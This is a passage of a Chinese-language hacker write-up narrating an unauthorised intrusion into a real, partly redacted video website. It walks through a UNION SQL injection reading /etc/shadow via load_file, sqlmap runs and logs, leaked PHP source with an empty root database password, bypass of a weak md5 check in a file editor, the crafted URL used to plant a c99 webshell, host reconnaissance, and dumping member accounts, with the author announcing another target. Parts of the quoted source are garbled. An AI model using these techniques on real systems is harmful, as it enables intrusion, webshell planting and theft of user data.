返回:

哈哈，还真是暴出来咯...接着当然是shadow....
faqid=1/**/and/**/1=2/**/union/**/select/**/1,2,3,4,load_file(char(47,101,116,99,47,115,104,97,100,111,119)),6,7,8,9/*
返回空白.....
这下暴不出来咯
看来在系统里是nobody...就好像在MM面前俺很潇洒,在真真面前老老实实滴:)
接下来杂办呢？
写文件？!
magic_quotes_gpc=on...我竟然把该死的gpc给忘了....写不了文件，又是nobody,还能干什么吗？先用工具跑下表段，数据库信息。
knell@Knell-SuckEr:~/sqlmap$ sudo ./sqlmap.py -u "http://www.xxxxx.tv/us/faq.html?faqid=1" -v 1 --string "ball_arrow" --users --passwords (这个工具知道的人不多...讲下参数,-u当然是url了,-v是显示等级,1是显示所有细节。 --string就是true page的特征字符串 --users --passwords是mysql.user里的列名)
[sudo] password for knell:
sqlmap/0.5 coded by inquis
and belch

[*] starting at: 20:42:35
[20:42:39] [INFO] testing if GET parameter 'faqid' is dynamic
[20:42:41] [INFO] confirming that GET parameter 'faqid' is dynamic
[20:42:47] [INFO] GET parameter 'faqid' is dynamic
[20:42:47] [INFO] testing sql injection on GET parameter 'faqid'
[20:42:47] [INFO] testing numeric/unescaped injection on GET parameter 'faqid'
[20:42:54] [INFO] confirming numeric/unescaped injection on GET parameter 'faqid'
[20:42:57] [INFO] GET parameter 'faqid' is numeric/unescaped injectable
[20:42:57] [INFO] testing MySQL
[20:42:57] [INFO] query: CONCAT('2', '2')
[20:42:57] [INFO] retrieved: 22
[20:44:10] [INFO] performed 20 queries in 73 seconds
[20:44:10] [INFO] confirming MySQL
[20:44:10] [INFO] query: LENGTH('2')
[20:44:10] [INFO] retrieved: 1
[20:44:52] [INFO] performed 13 queries in 41 seconds
[20:44:52] [INFO] query: SELECT 2 FROM information_schema.TABLES LIMIT 0, 1
[20:44:52] [INFO] retrieved:
[20:45:10] [INFO] performed 6 queries in 17 seconds
remote DBMS: MySQL knell@Knell-SuckEr:~/sqlmap$ sudo ./sqlmap.py -u "http://www.xxxxx.tv/us/faq.html?faqid=1" -v 1 --string "ball_arrow" --tables[/color]
sqlmap/0.5 coded by inquis
and belch

[*] starting at: 22:36:50
[22:36:53] [INFO] testing if GET parameter 'faqid' is dynamic
[22:36:56] [INFO] confirming that GET parameter 'faqid' is dynamic
[22:37:00] [INFO] GET parameter 'faqid' is dynamic
[22:37:00] [INFO] testing sql injection on GET parameter 'faqid'
[22:37:00] [INFO] testing numeric/unescaped injection on GET parameter 'faqid'
[22:37:05] [INFO] confirming numeric/unescaped injection on GET parameter 'faqid'
[22:37:08] [INFO] GET parameter 'faqid' is numeric/unescaped injectable
[22:37:08] [INFO] testing MySQL
[22:37:08] [INFO] query: CONCAT('2', '2')
[22:37:08] [INFO] retrieved: 22
[22:37:57] [INFO] performed 20 queries in 49 seconds
[22:37:57] [INFO] confirming MySQL
[22:37:57] [INFO] query: LENGTH('2')
[22:37:57] [INFO] retrieved: 1
[22:38:29] [INFO] performed 13 queries in 32 seconds
[22:38:29] [INFO] query: SELECT 2 FROM information_schema.TABLES LIMIT 0, 1
[22:38:29] [INFO] retrieved:
[22:38:44] [INFO] performed 6 queries in 14 seconds
remote DBMS: MySQL 0){define("LANGUAGE", "_k");$strCookie = "kr";} elseif (strpos($_SERVER["SCRIPT_FILENAME"], "/us")>0){define("LANGUAGE", "_e");$strCookie = "us";} elseif (strpos($_SERVER["SCRIPT_FILENAME"], "/jj/")>0){// 銉嗐偣銉堛儑銈ｃ儸銈 儓銉猟efine("LANGUAGE", "");$strCookie = "jj";} elseif (strpos($_SERVER["SCRIPT_FILENAME"], "/jp/")>0){define("LANGUAGE", "");$strCookie = "jp";} else {define("LANGUAGE", "");$strCookie = "";}if (!headers_sent()){if ($strCookie""){SetCookie("plib_language", $strCookie, time()+60*60*24*2, "/", $_SERVER["HTTP_HOST"]);}}$strTitle = "";// 绠＄悊鑰呯敤銉勩兗銉玸witch ($_REQUEST["omalist"]){case "srch3838":ReportSearchKeywords();break;case "dnmv3838":ReportDownloads();break;case "dnmv3838sum":ReportDownloadsSum();break;case "compdir":ReportCompDir();break;default:}function connect(){@mysql_connect(DB_SERVER, DB_USER, DB_PWD) or die("database connect error");@mysql_query("use ".DB_NAME);@mysql_query("set wait_timeout=3");@mysql_query("set names utf8");}function CheckSession(){session_start();if ($_REQUEST[MovieSearchForm]=="GO"){$_SESSION[lw] = $_SESSION[type] = $_SESSION[looks] = $_SESSION[play] = $_SESSION[mosaic] = "";$_SESSION[srchtext] = htmlspecialchars($_REQUEST[srchtext]);for ($intCnt=1; $intCnt""){// echo "SQL $intCnt
$arySQL[$intCnt]
";$rs = mysql_query($arySQL[$intCnt], $DB);// if (!$rs) echo "Error1 db_exec:".$arySQL[$intCnt]."
";}}if ($rs){return $rs;} else {// echo "Error2 db_exec:".$arySQL[$intCnt-1]."
";return FALSE;}}function db_insert_id($DB){return @mysql_insert_id($DB);}function db_query($DB, $SQL){// @mysql_query("SET NAMES 'utf8'", $DB);return @mysql_query($SQL, $DB);}function db_fetch_row($RS, $RowCount=0){$rows = array();if (@mysql_data_seek($RS, $RowCount)){for ($intCnt=0; $intCnt"" && $_GET["dbedit_tbl"]"" && $_GET["dbedit_key"]"" && $_GET["dbedit_keyvalue"]""){$db = mysql_connect("localhost", "root", "");
这个程序员习惯真是不好...代码又是超级长，而且只管数据库连接的，竟然也N多其他函数...
不过要的东西已经有了....root的密码.......是空的....
$db = mysql_connect("localhost", "root", "");
.用脚指头想想都能知道,肯定是不允许外连...本想连上库，dump数据走人，看来现在只能搞个shell了....
那要怎么搞shell呢？呵呵，天无绝人之路哦。
于是我挨个读他的程序...郁闷，字段暴出的数据没换行，看起来超级累啊....
现在从数据库上下手是够呛了，不过找有文件操作功能,或者包含,命令执行漏洞还是可行的.
于是找啊找..先是在libs2.php里。
哇塞...好经典的代码啊..
function WriteTextFile($FileName, $TextData){$fp = fopen($FileName, "w");fputs($fp, $TextData);fclose($fp);}
这个函数传参直接是filename,textdata,也就是，找到用这个函数的程序，在reg_globals为on的情况下，基本就能直接利用写个webshell哦。
找啊找。。。找啊找。。其实已经是第三次找了..前两次都是找了N久没收获....离第一次渗透过去N天了..
最后也没找到用这个函数的文件，倒是有个更搞的:
function _template_textedit(){global $_SERVER;$crypt = md5($_REQUEST[file].$_SERVER[REMOTE_ADDR]);if ($_REQUEST[crypt]$crypt) die("_template_textedit password error");if (preg_match("/debugmsg/i", $_POST[text])) die("_template_textedit debug command error");@header('Content-Type: text/html; charset=UTF-8');echo TextEdit $_REQUEST[file]function HideFrame(){document.getElementById('iframe').innerHTML = '';}function ShowFrame_Upload(){document.getElementById('iframe').innerHTML = '';}function ShowFrame_List(){document.getElementById('iframe').innerHTML = '';}EOF;$dir = str_replace(basename($_SERVER[PHP_SELF]), "", $_SERVER[PHP_SELF]);if ($_POST[cmd]=="Update" && $_REQUEST[file]""){if (@copy("$_REQUEST[file]", "$_REQUEST[file]._backup".date("YmdHis"))){chmod("$_REQUEST[file]._backup".date("YmdHis"), 0666);} else {echo "./$_REQUEST[file]._backup".date("YmdHis")." 銇浉銇嶈炯銇裤亴鍑烘潵銇俱仜銈撱 傘儑銈ｃ儸銈 儓銉 睘鎬с倰 777 銇 ō瀹氥仚銈嬪繀瑕併亴銇傘倞銇俱仚銆?/font>";}if ($fp = @fopen("$_REQUEST[file]", "w")){fputs($fp, stripslashes($_POST[text]));fclose($fp);} else {echo "./$_REQUEST[file] 銇 浉銇嶈炯銇裤亴鍑烘潵銇俱仜銈撱 傘儑銈ｃ儸銈儓銉?銉曘偂銈ゃ儷灞炴 с倰 666 銇 ō瀹氥仚銈嬪繀瑕併亴銇傘倞銇俱仚銆?/font>";}} elseif ($_POST[cmd]=="Preview" && $_REQUEST[file]""){$fp = fopen("__preview.html", "w");fputs($fp, stripslashes($_POST[text]));fclose($fp);$file = @file("__preview.html");$text = @implode("", $file);$template = new TemplateHTML();$template->Template = $text;echo $template->HTML();}if ($_REQUEST[file]""){$file = @file($_REQUEST[file]);$text = @implode("", $file);if ($_REQUEST[file]=="(new)"){$action = "$_SERVER[PHP_SELF]?job=$_REQUEST[job]&crypt=$crypt";$filename = EOF;} else {$action = "$_SERVER[PHP_SELF]?job=$_REQUEST[job]&file=$_REQUEST[file]&crypt=$crypt";$fdate = date("Y/m/d H:i:s", filectime($_REQUEST[file]));$filename = EOF;}if (file_exists("./upload")){$fileupload = EOF;}$text = htmlspecialchars($text);echo $textEditFile: $dir$_REQUEST[file] $filename$fileupload-->
比较乱...慢慢看!
global $_SERVER;$crypt = md5($_REQUEST[file].$_SERVER[REMOTE_ADDR]);if ($_REQUEST[crypt]$crypt) die("_template_textedit password error");
REMOTE_ADDR也就是访问者的公网IP了，而file是request的,然后这个crypt就是把filename&remote_addr用md5加密.....看到这里真是想笑...这也叫crypt.....?
既然这一关过了，继续看下去：
$_SERVER[PHP_SELF]?job=$_REQUEST[job]&file=$_REQUEST[file]&crypt=$crypt
后面是指定的文件与这个不堪一击的crypt,那么，这个job到底是可以做什么呢？往上跟：
看到这一段:
';}function ShowFrame_List(){document.getElementById('iframe').innerHTML = '';}EOF;$dir = str_replace(basename($_SERVER[PHP_SELF]), "", $_SERVER[PHP_SELF]);if ($_POST[cmd]=="Update" && $_REQUEST[file]""){if (@copy("$_REQUEST[file]", "$_REQUEST[file]._backup".date("YmdHis"))){chmod("$_REQUEST[file]._backup".date("YmdHis"), 0666);}
已经可以利用了....不过还有更直接的！

然后....
if ($fp = @fopen("$_REQUEST[file]", "w")){fputs($fp, stripslashes($_POST[text]));fclose($fp);}
直接可以编辑文件哦。。
实验下:)
MD5(faq.html222.133.xxx.xxx,32) = d29882b0460217719ea83a542bdbf56e
构造查询:
jp/tbs_XXXXXXXXX.php?job=edit&file=faq.html&crypt=d29882b0460217719ea83a542bdbf56e

哈哈，很爽啊...直接可以写个webshell上去.
于是写了个c99webshell上去.

连上shell,很无情的告诉我，id是uid=99(nobody) gid=99(nobody) groups=99(nobody)
php是5.05,allow_url_fopen on，register_globals Off，magic_quotes_gpc On。
tcp ports:
tcp 0 0 0.0.0.0:32768 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:110 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN
tcp 0 0 :::22 :::* LISTEN
服务器配置:
cat /proc/cpuinfo
processor : 0
vendor_id : GenuineIntel
cpu family : 15
model : 2
model name : Intel(R) Xeon(TM) CPU 2.80GHz
一共是4核。
cat /proc/meminfo
MemTotal: 2075908 kB
内核版本竟然是变态的2.6.5.....
Linux version 2.6.5-1.358smp (bhcompile@bugs.build.redhat.com) (gcc version 3.3.3 20040412 (Red Hat Linux 3.3.3-7)) #1 SMP Sat May 8 09:25:36 EDT 2004
虽然前一阵子刚暴了个2.6.12-2.6.24的local root exploit,可惜这个用不上....况且俺可不是为root来的哦。。。
终于可以放心的连SQL啦啦啦。。。
嘎嘎

vip一览无余~~~~~dump下来，走人:)
渗透结束:)

没什么技术含量，只是给很多依赖windows的朋友们一个例子:)
问我要vip帐号的就免了....不过..俺又看上一个日本著名同类站....正在渗透中....